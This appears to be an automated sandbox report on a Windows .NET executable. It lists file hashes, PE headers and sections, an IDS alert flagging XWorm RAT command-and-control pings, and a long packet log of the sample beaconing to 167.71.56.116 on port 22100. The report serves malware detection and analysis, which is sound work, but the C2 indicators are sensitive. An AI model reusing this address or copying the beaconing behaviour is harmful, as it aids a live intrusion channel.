                                                                                                                                                                                                        MD5:f57ec853b0f01b0e9954cfbf8feeb081
                                                                                                                                                                                                        SHA1:f0197d2da76f563373686dd104305d1eeb21ec7c
                                                                                                                                                                                                        SHA256:3d07268c23490174416ef5a8061e318b5b8b820cb89b27803996085c3b3ee927
                                                                                                                                                                                                        SHA512:72593f450a183a53c81a70f9c23ab0eba4ce46c64c3713f64a6606a3f3344305dfbe3d747fde2c5353bcb6463eeefc9b3b0b29395feb9d71bc540a8d451a72af
                                                                                                                                                                                                        SSDEEP:768:zDf+ZLVzkPLie7Vs6Ji5YYFg9KDO/hg/l193T:f+PzILv7di/Fg9KDO/Cd1dT
                                                                                                                                                                                                        TLSH:02F26D483B908721D6EE2FF52DB3A14A023AF51B4D17E75E0CD4898A6B776C389007F6
                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                        Entrypoint:0x40a5ee
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x65A98107 [Thu Jan 18 19:50:31 2024 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        jmp dword ptr [00402000h]

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa598 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4c0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x85f4 | 0x8600 | 53d5b560ee49ba4a9b5146ee562601d1 | False | 0.4949277052238806 | data | 5.713623102639735 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xc000 | 0x4c0 | 0x600 | d24be674e9be309c1a25a815f2f738ef | False | 0.3717447916666667 | data | 3.6796695422943375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xe000 | 0xc | 0x200 | fd3ac7fbb8a34dc91e775b7c64e87bbc | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |


| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xc0a0 | 0x22c | data | | | 0.4784172661870504 |
| RT_MANIFEST | 0xc2d0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041 |


| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |


| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 02/07/24-03:23:12.549811 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49753 | 22100 | 192.168.2.6 | 167.71.56.116 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.562031984 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.773753881 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.773946047 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.796124935 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.985428095 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.985541105 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:04.007489920 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:04.196619034 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.533687115 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.737611055 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.737912893 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.831494093 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.941660881 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.941864014 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:08.035135984 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:08.145365000 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:10.996207952 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.205595970 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.205720901 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.262212038 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.415347099 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.415561914 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.471285105 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.476917982 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.480190039 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.624701977 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.685995102 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.689821959 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.689923048 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.709780931 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.899496078 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.899796009 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.919131041 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.930179119 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.937658072 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.109224081 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.139367104 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.148842096 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.149009943 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.169909000 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.360110998 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.360415936 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.381639004 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.571192026 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:16.901619911 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.105403900 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.105532885 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.125406981 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.309138060 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.312493086 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.328871012 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.336462021 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.338047028 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.515980005 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.539654016 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.554600954 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.554754019 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.574696064 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.771348000 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.771460056 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.789454937 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.791205883 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.791543961 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.987646103 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.994600058 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.994668961 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.005609989 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.028922081 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.198153019 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.198214054 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.232037067 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.242608070 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.244484901 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.401829958 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.446232080 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.462418079 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.462595940 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.484559059 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.681191921 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.682574034 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.701560974 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.712162971 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.726908922 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.899564981 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.929279089 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.941895008 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.941993952 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.966399908 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.156992912 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.157068968 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.180350065 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.181176901 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.183779001 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.371941090 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395103931 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395211935 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395661116 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.416632891 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.606570005 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.606648922 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.627819061 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.817801952 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.135905981 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:57.698905945 CET2210049735167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:57.882251978 CET2210049735167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.420644045 CET4973622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.626581907 CET2210049736167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.626691103 CET4973622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.638979912 CET4973622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.832537889 CET2210049736167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.832741022 CET4973622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.837157011 CET4973622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.839260101 CET4973722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:59.844537973 CET2210049736167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.038225889 CET2210049736167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.042586088 CET2210049736167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.054605007 CET2210049737167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.054719925 CET4973722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.069137096 CET4973722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.270015001 CET2210049737167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.270098925 CET4973722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.284224987 CET2210049737167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:00.485346079 CET2210049737167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.009900093 CET4973822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.221107960 CET2210049738167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.224493027 CET4973822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.238910913 CET4973822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.435709953 CET2210049738167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.436495066 CET4973822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.449830055 CET2210049738167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.461383104 CET4973822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.463009119 CET4973922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.647409916 CET2210049738167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.666716099 CET2210049739167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.668592930 CET4973922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.672239065 CET2210049738167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.685844898 CET4973922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.872387886 CET2210049739167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.872523069 CET4973922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:01.889345884 CET2210049739167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:02.076030970 CET2210049739167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:02.844165087 CET4974022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.056041002 CET2210049740167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.056173086 CET4974022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.070283890 CET4974022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.267411947 CET2210049740167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.267550945 CET4974022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.281445026 CET2210049740167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:03.478617907 CET2210049740167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.072326899 CET4974122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.282156944 CET2210049741167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.282263041 CET4974122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.297466993 CET4974122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.492328882 CET2210049741167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.492487907 CET4974122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.507000923 CET2210049741167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:04.702227116 CET2210049741167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.009836912 CET4974222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.215698957 CET2210049742167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.215831041 CET4974222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.236887932 CET4974222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.425518990 CET2210049742167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.425595999 CET4974222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.441939116 CET2210049742167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:05.630832911 CET2210049742167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.073453903 CET4974322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.278167009 CET2210049743167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.278575897 CET4974322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.305736065 CET4974322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.483170986 CET2210049743167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.487344027 CET4974322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.509974003 CET2210049743167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.690815926 CET2210049743167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:06.869596004 CET4974422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.073385954 CET2210049744167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.074619055 CET4974422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.088529110 CET4974422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.278074026 CET2210049744167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.278130054 CET4974422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.291888952 CET2210049744167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.481332064 CET2210049744167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.605551958 CET4974522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.822854996 CET2210049745167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.823080063 CET4974522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:07.837363005 CET4974522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.040138960 CET2210049745167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.040245056 CET4974522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.053913116 CET2210049745167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.257232904 CET2210049745167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.334089041 CET4974622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.543692112 CET2210049746167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.543782949 CET4974622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.557828903 CET4974622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.752861023 CET2210049746167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.756474018 CET4974622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.766969919 CET2210049746167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.965320110 CET2210049746167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:08.996428013 CET4974722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.213346004 CET2210049747167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.213418961 CET4974722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.230271101 CET4974722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.430166960 CET2210049747167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.430222988 CET4974722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.446697950 CET2210049747167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.646760941 CET2210049747167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:09.683320045 CET4974822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.000806093 CET4976222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.003453016 CET4976322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.013319969 CET2210049762167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.206397057 CET2210049762167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.206465006 CET2210049762167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.206973076 CET2210049763167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.211121082 CET4976322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.221430063 CET4976322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.414674997 CET2210049763167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.414864063 CET4976322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.424638033 CET2210049763167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:16.618170023 CET2210049763167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.390831947 CET4976422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.596209049 CET2210049764167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.596326113 CET4976422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.609217882 CET4976422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.801662922 CET2210049764167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.801922083 CET4976422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:21.814330101 CET2210049764167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:22.007112026 CET2210049764167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:26.667862892 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:26.883244991 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:26.883512020 CET4976522100192.168.2.6167.71.56.116
